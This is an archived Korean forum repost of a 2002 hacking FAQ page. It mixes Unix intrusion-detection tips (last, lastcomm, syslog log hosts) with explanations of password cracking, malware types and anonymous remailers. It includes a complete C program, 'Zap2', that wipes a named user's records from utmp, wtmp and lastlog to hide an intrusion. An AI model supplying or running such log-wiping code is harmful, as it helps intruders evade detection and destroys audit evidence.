기 타 해킹계의 현실
2011.12.19 10:39
아래 내용은, 2002년 12월 17일, 웹페이지 수집당시의 "https://babibabi.nayana.org/hack2.htm" 내용을 저장한 페이지입니다.
이 페이지의 내용은 최근에 변경되었을 수 있습니다.
검색어 "tcpdump"이(가) 강조표시되어 있으며, 강조표시 및 안내문구 없이 보실려면 여기를 누르시면 됩니다.
야후! 코리아는 이 페이지의 저작권자와 아무런 관련이 없으며, 또한 아래 내용에 대한 아무런 책임이 없습니다.
해킹계의 현실
해커 추적하기(Intrusion detection)
언제까지 해커에게 당하고만 있을것인가? 해커가 들어왔다면 추적을 해서 잡아내는 일 또한 중요하다고 할 수 있다. 이제 해커를 추적하는 방법에 대해
알아보기로 하자. 처음 시스템에 로그인하게 되면 다음과 같은 메시지를 보낼 것이다.
login: sakai
password:
Last login: Fri Mar 3 02:05:42 on console
SunOS Release 4.1.3-KLE1.1.3 (BARAM_KOR) #2: Sun Sep 26 10:16:21 KST 1993
You have mail.
1995년03월03일(금) 03시10분34초 KST
%
여기에 나타나는 Last login을 확인하고 자신이 로그인한 시간대가 아닌때에 로그인이 됐는가를 확인해 본다. 침입자가 들어온 것 같은 의심이 들 때
관리자에게 연락해 그 시간대의 로그와 프로세스를 확인해 추적을 하도록 한다. 혹은 위와 같이 자신의 시 스템 로그인 메시지를 확인하는 방법도 있지만,
다른 방법으로, last라는 명령을 이용, 자신의 시스템에 자신의 이름으로 들어온 유저를 찾을 수도 있다. 다음은 last의 예이다.
% last | more
ksh ttyqd casaturn.kaist.a Thu Mar 16 16:52 still logged in
chkim ttyr9 dal1.kaist.ac.kr Thu Mar 16 16:50 still logged in
hjha ttyqd danso.kaist.ac.k Thu Mar 16 16:49 - 16:51 (00:01)
hjha ttyra danso.kaist.ac.k Thu Mar 16 16:47 - 16:47 (00:00)
solee ttyra dangun.kaist.ac. Thu Mar 16 16:46 - 16:46 (00:00)
yjkim ttyr9 gaea.kaist.ac.kr Thu Mar 16 16:44 - 16:50 (00:05)
chkim ttyr9 dal1.kaist.ac.kr Thu Mar 16 16:42 - 16:43 (00:01)
drunken ttyra chagall.kaist.ac Thu Mar 16 16:40 - 16:40 (00:00)
shhong ttyra dbserver.kaist.a Thu Mar 16 16:39 - 16:39 (00:00)
jhlee ttyr9 paradise.kaist.a Thu Mar 16 16:38 - 16:39 (00:01)
hjha ttyra danso.kaist.ac.k Thu Mar 16 16:36 - 16:37 (00:00)
위의 예에서, last | grep myloginname을 입력하면, 자신의 ID로 언제 어디서, 누가 로그인했는지를 알 수 있게 된다. 숙련된 해커는 위의 last 정보가 유지된
시스템 파일을 지우고 가지만, 여기서는 비숙련 해커를 가정하고 명령을 쳐볼 수 있다. 또는 약 간은 먼 이야기이지만, 해커가 들어와서 어떤 일을 하고
갔는지를 알아내기 위해서는 lastcomm이라는 명령어가 있다. lastcomm은 지금 이시간까지 시스템에서 수행되었던 명령어들을 보여주게 된다. 만약에
lastcomm이 작동되지 않는다면 시스템 관리자가 다 음의 명령을 수행하도록 해야 한다.
% /usr/etc/accton /usr/adm/acct
% lastcomm | more
msgs ksh ttyp2 0.03 secs Thu Mar 16 16:58
less ksh ttyp2 0.06 secs Thu Mar 16 16:58
csh F ksh ttyp2 0.00 secs Thu Mar 16 16:58
csh F ksh ttyp2 0.00 secs Thu Mar 16 16:58
date ksh ttyp2 0.02 secs Thu Mar 16 16:58
stty ksh ttyp2 0.02 secs Thu Mar 16 16:58
stty ksh ttyp2 0.02 secs Thu Mar 16 16:58
biff ksh ttyp2 0.02 secs Thu Mar 16 16:58
hostname ksh ttyp2 0.02 secs Thu Mar 16 16:58
whoami ksh ttyp2 0.03 secs Thu Mar 16 16:58
hostname ksh ttyp2 0.02 secs Thu Mar 16 16:58
hostname ksh ttyp2 0.02 secs Thu Mar 16 16:58
hostname ksh ttyp2 0.02 secs Thu Mar 16 16:58
전문된 해커와 이를 막는 보안팀은 항상 여러가지 파일을 이용해서 보안을 체크하게 되며, last, lastcomm은 하나의 시작에 불 과하다. 이 절의 내용을
정리하면, 시스템에 로그인 하고 로그아웃하면 그 기록이 어딘가 남는다는 것인데. 다음의 네가지 파일 이 대표적이다.
/usr/adm/lastlog
각 유저마다 가장 최근의 로그인 시간을 기록한다.
finger 나 someone 에 의해 알 수 있다.
/etc/utmp
유저가 로그인 할 때마다 시간을 적어둔다.
/usr/adm/wtmp
유저가 로그인/로그 아웃할 때 시간을 적어둔다.
last 또는 last someone 의 명령을 쳐서 내용을 알수있다.
/usr/adm/acct
유저들이 사용하는 명령어를 적어둔다.
lastcomm 을 치면 내용을 알 수 있다.
하지만, 실제로 해커들은 이 모든 파일들을 지우고 나가는 것이 보통이며(생각을 보라, 나갈 때 자기가 들어왔다는 증거를 입멸 하고 나가는 것이 해커의
입장으로 서는 당연한 것이 아니겠는가), 따라서 일정한 시간 간격마다 혹은 하루의 어느 때에 수행하 도록 제어해주는 cron명령을 이용해 계속 위의
파일을 백업을 한다면 해커를 좀더 어렵게 만들 수 있겠다. 이는 관리자에게 필요 한 부분이지만, 안전한 호스트를 선택해 log만을 남기는 호스트를 두면
더욱 확실하다.(이는 물론 장비에 여유가 있을 때의 이야 기이다) 예를 들면,
/etc/syslog.conf 에서 정의를 하도록 하자.
#
# syslog configuration file
#
define LOGHOST eve
*.err;kern.debug;auth.notice;user.none /dev/console
mail.debug ifdef('LOGHOST',/var/log/syslog,@loghost)
mail.debug /var/log/syslog
로그 호스트를 설정한 예를 들어보자. 다음 로그는 로그 호스트인 eldar 의 로그 파일에 기록된 것이다. elbereth, luthien, be ren, eru, frodo, sam, aragorn,
gandalf, faramir, legolasgimli, indigo1,3,4,10, applic이 eldar로 로그를 보내도록 설정돼있다.
Mar 17 02:43:28 6C:eldar fingerd[17516]: connect from baikdu.kaist.ac.kr
Mar 17 02:43:42 6D:eldar ftpd[17518]: connection from baikdu.kaist.ac.kr
Mar 17 02:43:54 5E:eldar ftpd[17518]: FTP LOGIN FAILED FROM baikdu.kaist.ac.kr,
chester
Mar 17 02:44:15 6E:eldar ftpd[17518]: FTP LOGIN FROM baikdu.kaist.ac.kr as chester
Mar 17 09:37:16 6C:luthien.seri.re.kr sendmail[10578]: JAA10572: to=sysuh@kigam.re.kr, ctladdr=news (15/15), delay=00:0 0:09, mailer=smtp,
relay=sdp.kigam.re.kr.
[134.75.144.201], stat=Sent (JAA15213 Message accepted for delivery)
Mar 17 13:31:46 6B:frodo.seri.re.kr Xsession: poison: login
Mar 17 13:40:32 6C:gimli.seri.re.kr ftpd[533]: connect from eve.kaist.ac.kr
Mar 17 13:49:32 6D:indigo1.seri.re.kr ftpd[533]: connection from robin.kaist.ac.kr
이런 방법 외에도 파이어월, TCP wrapper 등을 이용해 아예 외부에서의 접근을 막아버릴 수 있다. 물론 tcpdump나 netmon들을 사용해 자신의 호스트로의
모든 접근을 감시할 수도 있다. 이와 같이 방어하는 기술도 점점 고도화가 되어 고수준의 해커가 아니 면 침투하기 어려운 호스트가 늘어가고 있다.
..UNIX 패스워드를 어떻게 깨나?
UNIX 패스워드를 어떻게 깨나?
일반적인 믿음과는 상반되겠지만, UNIX의 패스워드 파일은 해독할 수 없다. UNIX 패스워드는 단반향 함수(one way function)으로 암호화되어 있다. 로그인 프로그램은 "password:"라고 표시되는 프롬프트에서 입력되는 패스워드를 암호화하여 패스워드 파일에 암호화된 패스워드와 비교한다. 패스워드를 깨는 프로그램(password cracking program)은 단어장(wordlist)를 이용한다. 단어장에 있는 단어 하나씩을 암호화하여 패스워드 파일에 있는 암호와 비교한다. 지금까지 나와 있는 가장 좋은 패스워드 깨는 프로그램은 Alec Muffett이 작성한 Crack이다. DOS용 프로그램으로는 CrackJack이 가장 좋다. CrackJack은 ftp를 이용하여 clark.net의 /ub/jcase/ 디렉토리에서 구할 수 있다.
시스템 로그에서 내 존재를 없애는 방법은?
시스템 로그에서 내 존재를 없애는 방법은?
/etc/utmp, /usr/adm/wtmp와 /usr/adm/lastlog 파일을 변경한다. 이것들은 텍스트 파일이 아니라
서 vi로 편집할 수 없다. 특별한 목적을 지닌 프로그램을 작성해야 한다.
예:
#include <sys/types.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/file.h>
#include <fcntl.h>
#include <utmp.h>
#include <pwd.h>
#include <lastlog.h>
#define WTMP_NAME "/usr/adm/wtmp"
#define UTMP_NAME "/etc/utmp"
#define LASTLOG_NAME "/usr/adm/lastlog"
int f;
void kill_utmp(who)
char *who;
{
struct utmp utmp_ent;
if ((f=open(UTMP_NAME,O_RDWR))>=0) {
while(read (f, &utmp_ent, sizeof (utmp_ent))> 0 )
if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {
bzero((char *)&utmp_ent,sizeof( utmp_ent ));
lseek (f, -(sizeof (utmp_ent)), SEEK_CUR);
write (f, &utmp_ent, sizeof (utmp_ent));
}
close(f);
}
}
void kill_wtmp(who)
char *who;
{
struct utmp utmp_ent;
long pos;
pos = 1L;
if ((f=open(WTMP_NAME,O_RDWR))>=0) {
while(pos != -1L) {
lseek(f,-(long)( (sizeof(struct utmp)) * pos),L_XTND);
if (read (f, &utmp_ent, sizeof (struct utmp))<0) {
pos = -1L;
} else {
if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {
bzero((char *)&utmp_ent,sizeof(struct utmp ));
lseek(f,-( (sizeof(struct utmp)) * pos),L_XTND);
write (f, &utmp_ent, sizeof (utmp_ent));
pos = -1L;
} else pos += 1L;
}
}
close(f);
}
}
void kill_lastlog(who)
char *who;
{
struct passwd *pwd;
struct lastlog newll;
if ((pwd=getpwnam(who))!=NULL) {
if ((f=open(LASTLOG_NAME, O_RDWR)) >= 0) {
lseek(f, (long)pwd->pw_uid * sizeof (struct lastlog), 0);
bzero((char *)&newll,sizeof( newll ));
write(f, (char *)&newll, sizeof( newll ));
close(f);
}
} else printf("%s: ?\n",who);
}
main(argc,argv)
int argc;
char *argv[];
{
if (argc==2) {
kill_lastlog(argv[1]);
kill_wtmp(argv[1]);
kill_utmp(argv[1]);
printf("Zap2!\n");
} else
printf("Error.\n");
}
트로이목마/웜/바이러스/논리폭탄 이란 무엇인가?
트로이목마/웜/바이러스/논리 폭탄이란 무엇인가?
이 FAQ는 Theora가 작성한 것이다.
트로이 목마 :
트로이 목마를 기억하는가? 도시에 악독한 짓을 하기 위해 나쁜 놈들이 그 안에 숨어 있던 것이다. 트로이 컴퓨터 프로그램은 이와 비슷하다. 허가된 프로그램 속에서 허가되지 않은 기능을 수행하는 것이 바로 이 프로그램이다. 이것은 자신이 해야할 것이 아닌 다른 것, 대개는 (꼭 그런 것은 아니지만) 악의에 찬 어떤 것을 한거나, 프로그래머가 의도했던 것이 아닌 것을 하는 프로그램이다. 의도된 것이 아니라면, 버그라고 불러야 하고, 때때로 특징이라고 부를수도 있다. 몇몇 바이러스 검색 프로그램(scanner)에서 트리이 목마 프로그램을 검출한다. 어떤 바이러스 검색 프로그램은 트로이 목마를 검색할 수 없다. 어떤 바이러스 스캐너도 모든 트로이 목마 프로그램을 다 검출할 수 없다.
바이러스:
바이러스는 자신을 복재하는 독립적인 프로그램이다. 다른 프로그램에 기생할 수 있고, 자신의 복사를 만들 수 있다.(마치 기생 바이러스에서와 같이) 바이러스는 데이터를 망치거나 오염시킬 수 있다. 그리고 데이터를 변경하거나, 메모리나 디스크 공간을 이용함으로서 시스템의 성능을 저하시킬 수 있다. 어떤 바이러스 검색 프로그램은 바이러스를 검출한 다. 어떤 바이러스 검출 프로그램도 모든 바이러스를 검출할 수는 없다. 어떤 바이러스 검색 프로그램도 모든 혹은 일부, 알려지거나 혹은 알려지지 않거나, 현재 또는 미래의 바이러스로부터 보호할 수 없다.
웜:
Robert Morris Jr.에 의해서 유명하게 되었다. 웜은 자신을 증식한다. 시스템에서 시스템으로 증식하고 때때로 시스템의 성능을 떨어뜨린다. 자체로 완벽하고 네트워크를 이용하여 퍼져나간다. 이것은 바이러스가 디스크를 이용하는 것과 같다. 어떤 이는 바이러스나 웜에 대한 대책은 파일이나 네트워크를 가지지 않는 것이라고 한다. 아마 맞을 것이다. 아마 컴퓨터도 이 목록에 포함해야 할 것 같다.
논리 폭탄:
특정조건이 만족되면 특정형태의 '공격'을 하는 코드이다. 예를 들어, 12월 5일에 모든 파일을 지워버리는 논리폭탄이 있을 수 있다. 바이러스와 달리 논리폭탄은 자신을 복제할 수 없다. 바이러스 같은 것으로부터 나 자신을 어떻게 보호할 것인가? 이 FAQ는 Theora에 의해서 작성되었다. 가장 흔한 바이러스는 부트 섹터를 감염하는 것이다. 이러한 형태의 바이러스로부터 자신을 보호하기 위해서는 기록을 할 필요가 없는 디스크는 전부 기록방지하는 것이다. 확실히 기록방지된 부팅 디스켓을 보관하고 있어야 한다. 바이러스가 나타나면 일을 매우 쉽게 할 것이다. 좋은 바이러스 검색 프로그램으로 새로운 파일들을 조사해야 한다. 좋은 것들로 F-Prot, Dr. Solomon's Anti-Virus Toolkit, 그리고 Thunderbyte Anti-Virus가 있다. AVP 또한 좋은 프로그램이다. 한 가지 이상의 검색 프로그램을 가지고 있는 것이 좋다. 이번 달에 한 두 사람이 빠뜨린 바이러스가 있을 수 있으니까. 하루 8개의 바이러스가 평균적으로 만들어 진다. 어떤 바이러스 검색 프로그램도 그 추세를 좇아갈 수 없다. 그러나, 위의 4개는 현 추세를 좇아가고 있는 좋은 것들이다. 좋은 바이러스 검색 프로글매이라면 대부분의 주요 바이러스를 검출할 수 있다. 어떤 바이러스 검색 프로그램도 모든 바이러스를 검출할 수 있는 것이 아니다. 현재 5600여종의 바이러스가 있다. 항상 새로운 것이 작성된다. 바이러스 검출을 위해서 바이러스 검색 프로그램을 사용하고 있다면 자주 갱신을 해야 한다. 이상행동 방지 프로그램에 의존하고 있다면 이러한 종류의 프로그램은 쉽게 피해갈 수 있는 기법이 있음을 알아야 한다. 검색 프로그램과 무결성 조사 프로그램을 이용하려 한다면 이것이 보호에 어느정도 도움은 되지만 완벽한 것이 아님을 알아야 한다 . 상주 스캐너(resident scanner)와 같은 바이러스 검색 프로그램을 원할 수 있다. 이러한 프로그램은 램에 상주하여 프로그램 수행을 감시한다.(그리고 때때로 프로그램을 포함하는 파일을 감시하기도 한다.) 프로그램을 수행하려 하면 상주 스캐너는 제어권을 넘겨받고 프로그램을 먼저 검사한다. 바이러스가 없으면, 프로그램은 수행할 수 있도록 허가된다. 바이러스 검색 프로그램은 대부분의 트리이 목마 프로그램, 웜, 논리폭탄으로 보호해 주지 않는다. 이론적으로 논리폭탄 그리고/도는 웜으로부터 보호할 수 있지만, 대개는 그렇게 하지 않는다. 가장 좋은 방법은, 그리고 실제로 유일한 방법은, 시스템에 무엇이 있는지 알고 그것들이 자신에 의해 허가된 것들인지를 아는 것이다. 중요한 파일은 자주 백업을 해야 한다. DOS 시스템 파일은 기록방지해야 한다. 기록할 필요가 없는 모든 디스크는 기록방지를 한다. 바이러스가 생기면 놀라지 마라. 잘 모르면 회사 내의 지원부서를 불러서 anti-virus 프로그램을 이용하게 한다. 대바이러스(anti-virus) 프로그램을 공급한 회사의 지원이 부실한 경우는 회사를 바꾸라. 바이러스가 퍼지지 않도록 하는 가장 확실한 방법은 안 퍼뜨리는 것이다. 어떤 이들은 고의적으으로 퍼뜨린다. 그렇게 하지 않기를 바란다. 바이러스는 그렇게신나는 것이 아니다.
익명 재전송 메일 (anonymous remailer)이란 무엇인가?
익명 재전송 메일(anonymous remailer)이란 무엇인가?
이 FAQ는 Raph Levien에 의해 작성된 것이다.
익명 재전송 메일(Anonymous remailer)는 인터넷 상의 시스템으로 Usenet에 메시지를 익명으로 보낼 수 있도록 하는 것이다.
널리 사용되는 익명 재전송 메일은 두 가지가 있다. 첫째의 것이 anon.penet.fi 형이다. 두 번째는 cypherpunk 형이다. anon.penet.fi에 있는 형태의 것은 매우 인기가 있다. 160,000명 이상의 사용자가 이용했다. 약 수만명의 이용자가 날마다 이용하고 있는 것으로 생각된다. 이것의 큰 장점은 사용하기 쉽다는 것이다. cypherpunk 메일러는 보안성이 좋아서 인기가 높아가고 있다.
anon.penet.fi 시스템은 사용자는 익명 id를 얻어야 한다. 이미 하나 가지고 있는 사람에게 메일을 보내거나, ping@anon.penet.fi에 메일을 보내면 된다. 각각의 경우에 penet은 새로운 익명 id를 보내 준다. 예를 들어 an123456@anon.penet.fi와 같다. an123456은 시스템의 다른 사용자에게 메일을 보낸다. 다음과 같은 일이 일어난다.
1. 메일은 anon.penet.fi로 전송되어 Finland의 Espoo 근처에 있게 된다.
2. 이 단계는 anon.penet.fi에서 수행하는 소프트웨어에 의한다. Penet은 송신자의 email 주소를 데이터베이스에서 검색하고 숫자 코드로 그것을 대치한다. 이를 제외한 송신자에 대한 모든 정보는 삭제된다.
3. 그리고 나서 penet은 같은 데이터베이스에 있는 수신자의 번호를 검색한다. 그리고 실제의 email 주소로 대치한다.
4. 마지막으로 email을 수신자의 실제 주소로 보낸다.
이러한 방식에는 Usenet에 포스팅하는 것과 같은 다른 변형이 있을 수 있다.(이 경우 단계 3이 제외된다.) 그러나, 앞의 단계들이 기본적인 생각이다.
anon.penet.fi가 email 주소와 anon의 id를 비교할 때, 비밀 데이터베이스를 사용하는 반면에 cypherpunks의 재전송메일은 실제 자신을 숨기기 위해서 암호기법을 이용한다. 실제 email 주소으로 자신의 실제 신분을 숨기고 email을 보내거나 Usenet에 포스팅을 하려고 한다고 가정하자.
재선송메일러를 통해서 보내기 위해서 다음과 같은 일이 일어난다.
1. 메시지와 수신자의 주소를 암호화한다. 이 때 키는 재전송메일러가 선택한 공개키를 이용한다.
2. email을 재전송메일러에 보낸다.
3. 재전송메일러가 메일을 받을 때, 비밀키를 이용하여 복호화한다. 평문이 메시지와 수신자의 주소가 나타난다.
4. 송신자에 대한 모든 정보가 삭제된다.
5. 마지막으로 송신자의 주소로 email을 보낸다.
재전송메일러의 관리자를 믿는다면 이것은 꽤 괜찮은 편이다. 그러나, cypherpunks의 재전송메일러의 전체적인 점은 어떤 개인이나 시스템도 믿을 필요가 없다는 것이다. 따라서, 정말로 보안을 원하는 사람들은 재전송메일러를 연쇄적으로 사용할 수 있다. 만일 이러한 연결 중의 재전송메일러가 정직한 것이라면 메시지의 프라이버시가 보장된다.
연쇄적인 재전송메일러를 사용하기 위해서 먼저 러시아의 매트료시카 인형(양파)처럼 여러 층으으로 메시지를 암호화한다. 이러한 메시지를 준비하는 것은 지루하고 실수가 일어날 소지가 많으므으로 사람들은 자동화된 도구(premail package와 같은)를 이용한다. 어쨌던 메시지를 준비하고 나서, 첫 번째 수신 재전송메일러에 보낸다. 이것은 암호화의 가장 바깥쪽에 있는 것과 대응된다.
각 재전송메일러는 암호화된 층을 하나씩 벗겨서 다음 곳으로 보내어 최종 재전송메일러에 도착하게 된다. 이 때, 가장 안 쪽의 암호화된 메시지만 남는다. 이것이 풀리면 평문과 수신자의 주소이 나타난다. 이 때 메시지는 실제 수신자에게 보내진다.
재전송메일은 많은 지역에 위치한다. 일상적인 메시지는 목적지에 도착하기 전에 캐나다, 네델란드, Berkeley대학 그리고 핀란드을 지나게 된다.
암호화된 메시지를 준비해야하는 어려움과 더불어, cypherphunk의 재전송메일러의 또 다른 단점은 anonymous mail에 대한 응답이 쉽게 오지 않는다는 것이다. 송신자 측의 모든 정보가 사라진다. 그렇지만 새로운 에일리어스 서버가 그것을 변경하려고 한다. 에일리어스 서버를 이용하려고 하면, 새로운 email 주소를 만들어야 한다(내것은 raph@alpha.c2.org이다.) 이 새 주소로 보내진 메일은 그 사람의 실제 주소로 보내지며 그 과정은 알 수 없게 된다.
이것을 해결하기 위해, 먼저 email 주소를 여러 층으로 암호화를 한다. 그리고나서 암호화된 통로을 통해서, 사용하고자 하는 nickname과 함께 암호화된 주소를 에일리어스 서버에 보낸다. 에일리어스 서버는 암호화된 주소를 데이터베이스에 등록한다. 에일리어스 서버는 응답 메일을 anon.penet.fi와 같은 방시으로 처리하는데 익명 재전송메일러의 연쇄를 통해서 전달한다는 것이 다르다.
최대의 보안을 하기 위해서, 사용자는 사용자는 연쇄의 재전송메일러가 email주소에서 한 암호화 층을 제거할 때 또 다른 층의 암호화를 추가할 수 있다. 사용자가 최종적으로 email을 얻을 경우, 다층의 암호화가 되어 있다. 매트료시카 인형은 한 번에 하나씩 꺼내어 마지막 평문 메시지가 드러나도록 한다.
마지막으로 생각할 점은 재전송메일러들이 모두 안정적이어야 한다는 것이다. 이것은 특히 연쇄적인 재전송메일러를 이용했을 경우에 그렇다. -- 하나라도 제대로 동작하지 않는 것이 있다면 메시지는 없어지게 된다. 이것은 왜 필자가 안정적인 재전송메일러의 목록을 유지하고 있는지의 이유이다. 안정적인 제전송메일러를 선택하면 메시지가 원하는 곳에 도착할 확률이 매우 높다.
127.0.0.1은 무엇인가?
127.0.0.1은 무엇인가?
127.0.0.1은 네트워크 접속의 루프백(loopback)이다. telnet, ftp를 하면 자신의 기계로 접속한다
댓글 [0]
번호 | 제목 | 글쓴이 | 조회 | 추천 | 등록일 |
---|---|---|---|---|---|
[공지] | 강좌 작성간 참고해주세요 | gooddew | - | - | - |
1303 | 기 타| linux_ppp | gooddew | 5159 | 0 | 12-19 |
1302 | 기 타| linux_FAQ | gooddew | 5140 | 0 | 12-19 |
1301 | 기 타| linux_ansi 코드 사용법 [1] | gooddew | 5805 | 0 | 12-19 |
1300 | 기 타| 방화벽 강좌 모음 | gooddew | 5694 | 0 | 12-19 |
1299 | 기 타| Hard Drive 빠르게 만들기 | gooddew | 5967 | 0 | 12-19 |
1298 | 기 타| GRUB 설정하기 | gooddew | 6308 | 1 | 12-19 |
1297 | 기 타| DNS server 강좌 모음 | gooddew | 5270 | 0 | 12-19 |
1296 | 기 타| DHCP 서버 구축하기 | gooddew | 7111 | 0 | 12-19 |
1295 | 기 타| 리눅스 X-WINDOW | gooddew | 5337 | 0 | 12-19 |
1294 | 기 타| 리눅스 따라하기 종합 완결편(160Mb) | gooddew | 5251 | 1 | 12-19 |
1293 | 기 타| 리눅스 설치하기 | gooddew | 5242 | 0 | 12-19 |
1292 | 기 타| 유용한 CMD 명령어들 [1] | gooddew | 7051 | 0 | 12-19 |
1291 | 기 타| 리눅스 역사 [1] | gooddew | 5044 | 0 | 12-19 |
1290 | 기 타| 리눅스 CUI 명령어 강좌 [3] | gooddew | 5666 | 0 | 12-19 |
1289 | 서버 / IT| 해킹피해시스템(Windows NT/2000) 분석절차 | gooddew | 7538 | 0 | 12-19 |
» | 기 타| 해킹계의 현실 | gooddew | 5831 | 0 | 12-19 |
1287 | 서버 / IT| 해킹에 관한 질문과 답변 | gooddew | 8379 | 0 | 12-19 |
1286 | 기 타| 취약성분석 | gooddew | 5150 | 0 | 12-19 |
1285 | 서버 / IT| 정보보호기술동향 | gooddew | 6963 | 0 | 12-19 |
1284 | 기 타| 안전한 유닉스 프로그래밍을 위한 지침서 V.0.7 | gooddew | 5243 | 0 | 12-19 |